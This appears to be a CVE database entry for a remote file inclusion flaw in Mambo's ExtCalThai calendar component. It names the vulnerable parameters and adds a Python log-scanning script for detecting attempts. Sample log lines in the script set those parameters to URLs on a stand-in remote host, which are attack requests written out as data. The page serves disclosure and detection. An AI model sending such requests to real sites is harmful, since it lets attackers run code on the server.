CVE-2006-6634
Description
PHP remote file inclusion in Mambo's ExtCalThai component allows arbitrary code execution.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
Multiple PHP remote file inclusion vulnerabilities exist in the ExtCalThai component for Mambo, versions 0.9.1 and earlier. Attackers can exploit these by providing a crafted URL in specific parameters, such as CONFIG_EXT[LANGUAGES_DIR] in admin_events.php, mosConfig_absolute_path in extcalendar.php, or CONFIG_EXT[LIB_DIR] in lib/mail.inc.php [1].
Exploitation
An unauthenticated remote attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable component. The attacker needs to control the value of one of the vulnerable parameters, such as CONFIG_EXT[LANGUAGES_DIR], and point it to a remote file that they control, for example, a web shell disguised as an image file [1].
Impact
Successful exploitation of these vulnerabilities allows a remote attacker to execute arbitrary PHP code on the server. This can lead to a compromise of the application and potentially the underlying system, with the attacker gaining the privileges of the web server process.
Mitigation
ExtCalThai versions 0.9.1 and prior are affected. No specific patched version or release date is available in the provided references. It is recommended to remove or disable the ExtCalThai component if it is not actively maintained or updated. Other versions may also be affected [1].
AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
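One way to hunt for attempts against these parameters in web server access logs is sketched below. It is an added example, not part of the CVE record or the ExtCalThai project; it assumes common/combined log format, and the sample log lines, paths and hosts are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameter pairs named in the CVE description.
WATCHED = {
    "admin_events.php": "CONFIG_EXT[LANGUAGES_DIR]",
    "extcalendar.php": "mosConfig_absolute_path",
    "lib/mail.inc.php": "CONFIG_EXT[LIB_DIR]",
}
# A directory setting that starts with scheme:// is a URL, not a local path.
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)
# Request target inside a common/combined-format access log line.
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def flag_rfi_attempts(lines):
    """Return (script, parameter, value) for requests that set a watched
    parameter to a remote location."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # parse_qsl percent-decodes, so %5B/%5D-encoded brackets still match.
        params = parse_qsl(url.query, keep_blank_values=True)
        for script, wanted in WATCHED.items():
            if not url.path.endswith("/" + script):
                continue
            hits += [(script, n, v) for n, v in params
                     if n == wanted and REMOTE.match(v)]
    return hits

# Constructed sample log lines (paths, hosts and addresses are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /cal/extcalendar.php?mosConfig_absolute_path=http://example.invalid/a.txt HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2007:10:00:05 +0000] "GET /cal/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=ftp%3A%2F%2Fexample.invalid%2Fx HTTP/1.0" 200 0',
    '192.0.2.12 - - [01/Jan/2007:10:00:09 +0000] "GET /cal/extcalendar.php?mosConfig_absolute_path=/var/www/site HTTP/1.1" 200 900',
    '192.0.2.13 - - [01/Jan/2007:10:00:12 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in flag_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Only query-string parameters are inspected; values sent in a POST body do not appear in standard access logs and need a WAF or application-level log to catch.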
Affected products (2)
- Range: <=0.9.1
Patches
No patches discovered yet.
References (4)